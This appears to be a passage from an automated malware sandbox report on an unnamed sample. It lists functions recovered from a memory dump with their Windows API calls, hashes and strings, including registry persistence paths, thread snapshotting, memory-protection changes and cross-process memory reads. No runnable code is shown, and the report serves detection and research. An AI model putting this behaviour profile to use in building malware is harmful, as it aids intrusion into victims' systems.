Instruction Fuzzy Hash: 3B414DB1644301AFE720DF64DD41B9BBBE9AB88314F008D29F599C6290F730F9159B62

Uniqueness

Uniqueness Score: -1.00%

Function 049F2D2F, Relevance: 4.5, APIs: 3, Instructions: 39registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,05A987E8,?), ref: 049F2D44
RegOpenKeyA.ADVAPI32(80000001,05A987E8,?), ref: 049F2D51
lstrlen.KERNEL32(05A987E8,00000000,00000000,00000028,?,?,?,?,04A0F9C6,00000001,?), ref: 049F2D72

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CreateOpenlstrlen
String ID:
API String ID: 2865187142-0
Opcode ID: d53e1f41e79c709f66789329174e28a5eeb7d2a5cc85e41bfa501576e082ada4
Instruction ID: d8a0f135e73f959d31eba22623b881b3846ca9e178df978aa2c8011c64ed2e83
Opcode Fuzzy Hash: d53e1f41e79c709f66789329174e28a5eeb7d2a5cc85e41bfa501576e082ada4
Instruction Fuzzy Hash: F1F09075004208BFEB10AF50DC88FEA7BBCEB55360F008165FD0286250E675E991CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 049F19F6, Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(000003CC,04A10B50), ref: 049F1A00

Part of subcall function 04A0F22B: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,049F1A0B), ref: 04A0F254
Part of subcall function 04A0F22B: RtlDeleteCriticalSection.NTDLL(04A17360), ref: 04A0F287
Part of subcall function 04A0F22B: RtlDeleteCriticalSection.NTDLL(04A17380), ref: 04A0F28E
Part of subcall function 04A0F22B: ReleaseMutex.KERNEL32(000003B0,00000000,?,?,?,049F1A0B), ref: 04A0F2B7
Part of subcall function 04A0F22B: FindCloseChangeNotification.KERNELBASE(?,?,049F1A0B), ref: 04A0F2C3
Part of subcall function 04A0F22B: ResetEvent.KERNEL32(00000000,00000000,?,?,?,049F1A0B), ref: 04A0F2CF
Part of subcall function 04A0F22B: CloseHandle.KERNEL32(?,?,049F1A0B), ref: 04A0F2DB
Part of subcall function 04A0F22B: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,049F1A0B), ref: 04A0F2E1
Part of subcall function 04A0F22B: SleepEx.KERNEL32(00000064,00000001,?,?,049F1A0B), ref: 04A0F2F5
Part of subcall function 04A0F22B: HeapFree.KERNEL32(00000000,00000000,?,?,049F1A0B), ref: 04A0F319
Part of subcall function 04A0F22B: RtlRemoveVectoredExceptionHandler.NTDLL(02C905B8), ref: 04A0F34F
Part of subcall function 04A0F22B: SleepEx.KERNELBASE(00000064,00000001,?,?,049F1A0B), ref: 04A0F36B

CloseHandle.KERNEL32(000003CC), ref: 049F1A15
HeapDestroy.KERNELBASE(056A0000), ref: 049F1A25

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Sleep$Close$CriticalDeleteEventHandleHeapSection$ChangeDestroyExceptionFindFreeHandlerMutexNotificationReleaseRemoveResetVectored
String ID:
API String ID: 3503058985-0
Opcode ID: 632e64f97e058c9ac524df2f7991aed3e2b52712342f9a1cf07dab457b166cc9
Instruction ID: 61a3dab4bd0d5c999bc9e300fb36817baa5dbc7295048a19c7247d33410a7878
Opcode Fuzzy Hash: 632e64f97e058c9ac524df2f7991aed3e2b52712342f9a1cf07dab457b166cc9
Instruction Fuzzy Hash: 2CE042746112019BAF10EF79BD99A1637EDEB287417099924BA05EA1A0DA28EC42DB60

Uniqueness

Uniqueness Score: -1.00%

Function 049FC6EB, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0CFA6: RegQueryValueExA.KERNELBASE(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,00000003,00000000,?,00000000,?,04A0E66E,04A0E66E,?,04A088E0,00000000), ref: 04A0CFDE
Part of subcall function 04A0CFA6: RtlAllocateHeap.NTDLL(00000000,04A088E0), ref: 04A0CFF2
Part of subcall function 04A0CFA6: RegQueryValueExA.ADVAPI32(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?), ref: 04A0D00C
Part of subcall function 04A0CFA6: RegCloseKey.KERNELBASE(?,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?,?,?,00000000,?,?,?), ref: 04A0D036

HeapFree.KERNEL32(00000000,?,Ini,?,?,74B5F710,00000000,00000000,?,?,?,04A0F1EB,?), ref: 049FC777

Part of subcall function 049F7D40: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,04A0A2A7,?,00000001,-00000007,00000000,?,?,?), ref: 049F7D62

Strings

Ini, xrefs: 049FC6FB

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID: Ini
API String ID: 1301464996-1327165576
Opcode ID: 9c169fecbddef03e83d4b8b897c9cfaf8631c993e3a908efd9627cb75bfaa097
Instruction ID: 7ccd737161be6472d1b3dc1778662c708cb8935bab327fcc554d231870d8cc1d
Opcode Fuzzy Hash: 9c169fecbddef03e83d4b8b897c9cfaf8631c993e3a908efd9627cb75bfaa097
Instruction Fuzzy Hash: F6117075600709EBEB14DA49DD80EAE77ADEB86B14F108075FA01DB250D774BD01AB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A007A6, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000000,04A1729C,00000018,04A0C6CE,NTDLL.DLL,7250775A,04A0C6CE,NTDLL.DLL,4772644C,04A0C6CE,NTDLL.DLL,4C72644C,00000000,00000000,?,04A0C6CE), ref: 04A0085B

Strings

NTDLL.DLL, xrefs: 04A007EF, 04A00813, 04A00837

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID: NTDLL.DLL
API String ID: 3510742995-1613819793
Opcode ID: cdaa144e86ee7295de2a1413e888fdd332fe3cfcaddbb8e6344c9c4eef0e142d
Instruction ID: cd484684bf3556f2cdf26feb4ad9e71afc4da03cf9866c37eb5f90ad5094c387
Opcode Fuzzy Hash: cdaa144e86ee7295de2a1413e888fdd332fe3cfcaddbb8e6344c9c4eef0e142d
Instruction Fuzzy Hash: 7C118E79605008AFD725DF55FC51DA63BADFBA4310B089126B9488F1B0E738AD07CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 049FA1DB, Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,?,?,00000000,00000000), ref: 049FA20B
GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,?,?,00000000), ref: 049FA252

Part of subcall function 04A02A35: RtlFreeHeap.NTDLL(00000000,?,049F10F7,?,?,0000002C,?), ref: 04A02A41

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
String ID:
API String ID: 552344955-0
Opcode ID: 2e9312f893438e70f0fca3678362d5d4686ebfc822464d6d48e03def9d6df694
Instruction ID: f2d88bbd2cf4ba391b4901e1e81ff83040d7c8a75a1813193e9ec0b37232028d
Opcode Fuzzy Hash: 2e9312f893438e70f0fca3678362d5d4686ebfc822464d6d48e03def9d6df694
Instruction Fuzzy Hash: 4D117372B00208ABDB119FD8CC44BDEBBBDEF95358F608069E50497240DB75EE01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 049FE714, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0CFA6: RegQueryValueExA.KERNELBASE(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,00000003,00000000,?,00000000,?,04A0E66E,04A0E66E,?,04A088E0,00000000), ref: 04A0CFDE
Part of subcall function 04A0CFA6: RtlAllocateHeap.NTDLL(00000000,04A088E0), ref: 04A0CFF2
Part of subcall function 04A0CFA6: RegQueryValueExA.ADVAPI32(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?), ref: 04A0D00C
Part of subcall function 04A0CFA6: RegCloseKey.KERNELBASE(?,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?,?,?,00000000,?,?,?), ref: 04A0D036

HeapFree.KERNEL32(00000000,?,?,?,Kill,?,?), ref: 049FE77F

Part of subcall function 049F4FA9: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,049FE76A,00000000,00000001,?,?,?,Kill,?,?), ref: 049F4FBB
Part of subcall function 049F4FA9: StrChrA.SHLWAPI(?,00000020,?,00000000,049FE76A,00000000,00000001,?,?,?,Kill,?,?), ref: 049F4FCA

Part of subcall function 049FA4FF: CloseHandle.KERNEL32(?), ref: 049FA525
Part of subcall function 049FA4FF: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 049FA531
Part of subcall function 049FA4FF: GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess), ref: 049FA548
Part of subcall function 049FA4FF: GetProcAddress.KERNEL32(00000000), ref: 049FA54F
Part of subcall function 049FA4FF: Thread32First.KERNEL32(?,0000001C), ref: 049FA55F
Part of subcall function 049FA4FF: CloseHandle.KERNEL32(?), ref: 049FA5A7

Strings

Kill, xrefs: 049FE721

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
String ID: Kill
API String ID: 2627809124-2803628375
Opcode ID: 01dc1b4813b9d92fff39d14c18e9a6017e2e723154e562d20fbee85a6a21e468
Instruction ID: 7faa8d5439335c1c29b81cbb963ce71533ac206130244dc16a443cf2f72e3e4d
Opcode Fuzzy Hash: 01dc1b4813b9d92fff39d14c18e9a6017e2e723154e562d20fbee85a6a21e468
Instruction Fuzzy Hash: FC01C875501218FF9F119BA5EC84CAFBBFDEBA0655B004075F901E2160DA35BE01C770

Uniqueness

Uniqueness Score: -1.00%

Function 04A073D1, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0CFA6: RegQueryValueExA.KERNELBASE(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,00000003,00000000,?,00000000,?,04A0E66E,04A0E66E,?,04A088E0,00000000), ref: 04A0CFDE
Part of subcall function 04A0CFA6: RtlAllocateHeap.NTDLL(00000000,04A088E0), ref: 04A0CFF2
Part of subcall function 04A0CFA6: RegQueryValueExA.ADVAPI32(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?), ref: 04A0D00C
Part of subcall function 04A0CFA6: RegCloseKey.KERNELBASE(?,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?,?,?,00000000,?,?,?), ref: 04A0D036

HeapFree.KERNEL32(00000000,?,00000000,Scr,?,00000000,?,?,00000000,049FBCE8,04A10AF9,00000000,00000000), ref: 04A07443

Part of subcall function 049F4FA9: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,049FE76A,00000000,00000001,?,?,?,Kill,?,?), ref: 049F4FBB
Part of subcall function 049F4FA9: StrChrA.SHLWAPI(?,00000020,?,00000000,049FE76A,00000000,00000001,?,?,?,Kill,?,?), ref: 049F4FCA

Part of subcall function 04A08342: lstrlen.KERNEL32(049FF545,00000000,?,?,?,?,049FF545,00000126,00000000,?,00000000), ref: 04A08372
Part of subcall function 04A08342: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04A08388
Part of subcall function 04A08342: memcpy.NTDLL(00000010,049FF545,00000000,?,?,049FF545,00000126,00000000), ref: 04A083BE
Part of subcall function 04A08342: memcpy.NTDLL(00000010,00000000,00000126,?,?,049FF545,00000126), ref: 04A083D9
Part of subcall function 04A08342: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 04A083F7
Part of subcall function 04A08342: GetLastError.KERNEL32(?,?,049FF545,00000126), ref: 04A08401
Part of subcall function 04A08342: HeapFree.KERNEL32(00000000,00000000,?,?,049FF545,00000126), ref: 04A08427

Strings

Scr, xrefs: 04A073DE

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
String ID: Scr
API String ID: 730886825-1633706383
Opcode ID: 2e1d29aedbaffd6e1e07c14e1f385325e7cabc352e7b71bb44cb356a1bb5d978
Instruction ID: cc7a6cf953364c8d15cfcce9eee5c4aeeab26b24e03b19b2cb81103b0d735437
Opcode Fuzzy Hash: 2e1d29aedbaffd6e1e07c14e1f385325e7cabc352e7b71bb44cb356a1bb5d978
Instruction Fuzzy Hash: B001D175640204FBEF21AB90ED09FDF7FACEB50B54F008069B902A60E0DA75BE01DB61

Uniqueness

Uniqueness Score: -1.00%

Function 049FCA76, Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(04A17380), ref: 049FCA80
RtlLeaveCriticalSection.NTDLL(04A17380), ref: 049FCABC

Part of subcall function 04A0DBAB: lstrlen.KERNEL32(?,?,?,?,00000000,?,049F19EE,?), ref: 04A0DBF9
Part of subcall function 04A0DBAB: VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,?,?,00000000,?,049F19EE,?), ref: 04A0DC0B
Part of subcall function 04A0DBAB: lstrcpy.KERNEL32(00000000,?), ref: 04A0DC1A
Part of subcall function 04A0DBAB: VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,?,?,00000000,?,049F19EE,?), ref: 04A0DC2B

Part of subcall function 04A02A35: RtlFreeHeap.NTDLL(00000000,?,049F10F7,?,?,0000002C,?), ref: 04A02A41

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
String ID:
API String ID: 1872894792-0
Opcode ID: 3d43e7811596bc086416029d8c3e48f403394d7f2782e1e3c7d0192138b5e558
Instruction ID: 42b5474bbffbdd3784a04a1c7e0d4e2afcb5e787b0d8f80da518ea77f84d9340
Opcode Fuzzy Hash: 3d43e7811596bc086416029d8c3e48f403394d7f2782e1e3c7d0192138b5e558
Instruction Fuzzy Hash: 64F0EC3A301315ABA720AF5898848F5FBACFF59625301426AED5553320CA76BC018790

Uniqueness

Uniqueness Score: -1.00%

Function 04A058CD, Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(04A16FDC), ref: 04A058E2

Part of subcall function 04A03013: GetSystemTimeAsFileTime.KERNEL32(?), ref: 04A0303E
Part of subcall function 04A03013: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 04A0304B
Part of subcall function 04A03013: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04A030D7
Part of subcall function 04A03013: GetModuleHandleA.KERNEL32(00000000), ref: 04A030E2
Part of subcall function 04A03013: RtlImageNtHeader.NTDLL(00000000), ref: 04A030EB
Part of subcall function 04A03013: RtlExitUserThread.NTDLL(00000000), ref: 04A03100

InterlockedDecrement.KERNEL32(04A16FDC), ref: 04A05906

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
String ID:
API String ID: 1011034841-0
Opcode ID: 80cbb089634908c4c4ca8c07421eccb220620f6f75804c72fe6eefd311160bc7
Instruction ID: 72713cf7bd215fa62250518bbf4159eac4ebb74cadf845ae5e58e2c67e111b9a
Opcode Fuzzy Hash: 80cbb089634908c4c4ca8c07421eccb220620f6f75804c72fe6eefd311160bc7
Instruction Fuzzy Hash: C4E09231E24231BBAB219FB4BC08B1AA795AB817A4F038424F949D00E0E210B940DF91

Uniqueness

Uniqueness Score: -1.00%

Function 049FC133, Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04A03A91: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 04A03ACA
Part of subcall function 04A03A91: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 04A03B00
Part of subcall function 04A03A91: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04A03B0C
Part of subcall function 04A03A91: lstrcmpi.KERNEL32(?,00000000), ref: 04A03B49
Part of subcall function 04A03A91: StrChrA.SHLWAPI(?,0000002E), ref: 04A03B52
Part of subcall function 04A03A91: lstrcmpi.KERNEL32(?,00000000), ref: 04A03B64
Part of subcall function 04A03A91: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04A03BB5

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000010,?,?,?,04A13648,0000002C,049F7206,NTDLL.DLL,6547775A,00000000,04A0E4E3), ref: 049FC172

Part of subcall function 049FB8EB: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 049FB914
Part of subcall function 049FB8EB: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04A0EE74,00000000,00000000,00000028,00000100), ref: 049FB936

VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,04A13648,0000002C,049F7206,NTDLL.DLL,6547775A,00000000,04A0E4E3,?,00000318), ref: 049FC1FD

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
String ID:
API String ID: 4138075514-0
Opcode ID: fa2dd7a51c30afa509ee6cec010e893925e9dc912ae6bc7c5b52f865b496e949
Instruction ID: 0d71692a401439f5154ebb576549a8182f76df9185c6ed55ee05f880eb93ebb0
Opcode Fuzzy Hash: fa2dd7a51c30afa509ee6cec010e893925e9dc912ae6bc7c5b52f865b496e949
Instruction Fuzzy Hash: 4D21E671E01228ABDF11DFA5DC84ADEBBB5FF48714F14812AEA14B6250C3346A51CF50

Uniqueness

Uniqueness Score: -1.00%

Function 049F8547, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(41564441), ref: 049F855C

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f46681bb7b4daeb062b64cb5617ae9efc7a24ca075747e3b5be57f8ced73eec6
Instruction ID: 835a47123e9fbd28fc7d7bd88c5521c0f9b0a02ccac50c6884f7c1ace21fe82a
Opcode Fuzzy Hash: f46681bb7b4daeb062b64cb5617ae9efc7a24ca075747e3b5be57f8ced73eec6
Instruction Fuzzy Hash: AD217CB6A00118AFEF61EF98DD8099DB7B9FB48314B5488A6E701EB211D730FD428B50

Uniqueness

Uniqueness Score: -1.00%

Function 04A0E0CA, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(-00000002,?,?,00000000,?,?,049F1980,00000000,00000000), ref: 04A0E105

Part of subcall function 04A0E3F9: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,04A17380), ref: 04A0E410

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HandleInformationModuleProcessQuery
String ID:
API String ID: 2776635927-0
Opcode ID: 74bac37abca7aacc52500ddafd4fd8ca469af83ffcf8b69e30ed45996ceeff21
Instruction ID: 11926447dcf239ac8bed8a2cef3477bdeead3dd31368826216c0a9e96d0446a7
Opcode Fuzzy Hash: 74bac37abca7aacc52500ddafd4fd8ca469af83ffcf8b69e30ed45996ceeff21
Instruction Fuzzy Hash: A1219071701204AFEB20CF59E98096B77E5EF54794B14CC29EA55CB290DB71F900EB20

Uniqueness

Uniqueness Score: -1.00%

Function 049FD5E9, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 049FD63B

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8539426990e20cb497cb2188c987400cb04366ae4a2eab5b3b3ad19dbcddc00a
Instruction ID: 9737fb9157c98840d5eaf6c9b9f2ad6c734bae5ee1c606f8b75bc90b772903fc
Opcode Fuzzy Hash: 8539426990e20cb497cb2188c987400cb04366ae4a2eab5b3b3ad19dbcddc00a
Instruction Fuzzy Hash: BE11DB3660020AAFDF019F99DC409DA7BA9EF4C374B058235FE2996161CB35ED21DF90

Uniqueness

Uniqueness Score: -1.00%

Function 049F6932, Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON

Download Yara Rule

APIs

Part of subcall function 04A082D9: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,?,00000000,049F6939,?,049FCD8A,?), ref: 04A082F8
Part of subcall function 04A082D9: PathFindFileNameW.SHLWAPI(00000000,04A170E8,?,00000000,00000800,00001000,?,00000000,049F6939,?,049FCD8A,?), ref: 04A08303
Part of subcall function 04A082D9: _wcsupr.NTDLL ref: 04A08310
Part of subcall function 04A082D9: lstrlenW.KERNEL32(00000000), ref: 04A08318

ResumeThread.KERNEL32(00000004,?,049FCD8A,?), ref: 049F6947

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
String ID:
API String ID: 3646851950-0
Opcode ID: 444b46712c121733911c3e1baae9c7f68198d605be64160ae7d0e1e3de51cd0f
Instruction ID: 0fda7358f389b5123e2f75c7467ea6cc277a529217a1864b2942e8f21352d133
Opcode Fuzzy Hash: 444b46712c121733911c3e1baae9c7f68198d605be64160ae7d0e1e3de51cd0f
Instruction Fuzzy Hash: 1CD05E74208301A6EF212E249E05B1ABDA5EF50B98F10C428FB89654A0DB72BC91A705

Uniqueness

Uniqueness Score: -1.00%

Function 04A114B0, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 04A114A2

Part of subcall function 04A115F5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00023634,vT), ref: 04A1166E

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 76f764a1f0e7c78ed261ca1a9b6c49eb31e43b6187bd4a4416e13bf105a25b37
Instruction ID: f4e1fa2138c3ebbacfee86828998958a2d413c18434b839637c369325e6ce0c1
Opcode Fuzzy Hash: 76f764a1f0e7c78ed261ca1a9b6c49eb31e43b6187bd4a4416e13bf105a25b37
Instruction Fuzzy Hash: FDA001F63AA107BD39096A556E06C7B422DD6DCEA9330896AAA1398160B890394A2971

Uniqueness

Uniqueness Score: -1.00%

Function 04A11495, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 04A114A2

Part of subcall function 04A115F5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00023634,vT), ref: 04A1166E

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 6a2a0ec5bdbaefa0e4a6a5b492cb2b15610fcdef89b1a4dfdac6cacd44c31c92
Instruction ID: f9f98ba036bb12bb968b9a7ca96a91119f31863f0c79017f0c44b79d2ff7e1f9
Opcode Fuzzy Hash: 6a2a0ec5bdbaefa0e4a6a5b492cb2b15610fcdef89b1a4dfdac6cacd44c31c92
Instruction Fuzzy Hash: 73A012F13A51027C380415001D01C37012CD1DCD25330C019B50394020784038051430

Uniqueness

Uniqueness Score: -1.00%

Function 049F253A, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 99c6406838cd8374003ff18ddad50934aa870c61689481536b62f36fa88ef03c
Instruction ID: 2e2b7b1a02490d56e4e4a52f8bfbcc3d3a70e1136856c0a99d6ff1d6d03fd85c
Opcode Fuzzy Hash: 99c6406838cd8374003ff18ddad50934aa870c61689481536b62f36fa88ef03c
Instruction Fuzzy Hash: 7AB01231000200BBEE014F00DD04F057F61E770B00F014410B208800F0C23A1D62EB04

Uniqueness

Uniqueness Score: -1.00%

Function 04A02A35, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,?,049F10F7,?,?,0000002C,?), ref: 04A02A41

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6ea9276ad74b92812f36e6fdc87ef77d8555dbfc42de505ee04b748ae651406f
Instruction ID: 770609b98d7abbf9ec82b81db3734a2c282fb6690ba90d22560365c7fc869354
Opcode Fuzzy Hash: 6ea9276ad74b92812f36e6fdc87ef77d8555dbfc42de505ee04b748ae651406f
Instruction Fuzzy Hash: A9B01231000200FBEE018F00DD04F057AA1E770B00F018010B204400F0C2395C22EB14

Uniqueness

Uniqueness Score: -1.00%

Function 04A01F44, Relevance: 1.3, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

memset.NTDLL ref: 04A01F62

Part of subcall function 04A0E4B0: memset.NTDLL ref: 04A0E4D6
Part of subcall function 04A0E4B0: memcpy.NTDLL ref: 04A0E4FE
Part of subcall function 04A0E4B0: GetLastError.KERNEL32(00000010,00000218,04A11C7D,00000100,?,00000318,00000008), ref: 04A0E515
Part of subcall function 04A0E4B0: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04A11C7D,00000100), ref: 04A0E5F8

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastmemset$AllocateHeapmemcpy
String ID:
API String ID: 4290293647-0
Opcode ID: 97b512fcc7391956fe391690a100bcd2a141cad47ce8d4ec597e7b66fa65fadd
Instruction ID: 18d9d6db80bf1d388417f4d0dc5a3ece4d0b9902c1eb660f857c4f41e86363f0
Opcode Fuzzy Hash: 97b512fcc7391956fe391690a100bcd2a141cad47ce8d4ec597e7b66fa65fadd
Instruction Fuzzy Hash: 6401D171A057086BD721AF29ED40B9B3BE8EF89318F00C52AFC44972D0D776F9158BA1

Uniqueness

Uniqueness Score: -1.00%

Function 049F957A, Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 049F9584

Part of subcall function 04A01968: RegOpenKeyExA.KERNELBASE(049F959C,00000000,00000000,00020119,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,049F959C,?,80000001), ref: 04A019A1
Part of subcall function 04A01968: RegOpenKeyExA.ADVAPI32(049F959C,00000000,00000000,00020019,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,049F959C,?,80000001), ref: 04A019B5
Part of subcall function 04A01968: RegCloseKey.KERNELBASE(80000001,80000001,Client32,?,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,049F959C,?,80000001), ref: 04A019FE

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Open$Closememset
String ID:
API String ID: 1685373161-0
Opcode ID: bf9af8248c8fda574d28e2be155fa00d992eb51c7ff9eb997397315e70ae1381
Instruction ID: 677cc88df5a4ea07c6efc6dca1e1195dba8c8254bf7b19ad4447a0d9beb9dbcc
